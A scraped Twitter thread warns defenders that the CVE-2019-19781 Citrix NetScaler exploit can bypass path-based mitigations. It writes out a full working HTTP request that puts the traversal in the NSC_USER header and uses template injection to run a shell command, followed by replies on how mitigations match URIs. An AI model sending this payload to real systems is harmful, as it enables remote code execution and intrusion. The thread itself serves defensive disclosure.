For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
-
-
I mean in the URI, Jesus.
-
Oh. I thought that was already known. The attack may have "/vpns/" or "/../" in the URI based on whether the vulnerable system is being targeted by its real IP address or its virtual IP address. And thus the two different things that the Citrix mitigation is looking for.
- 1 more reply
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.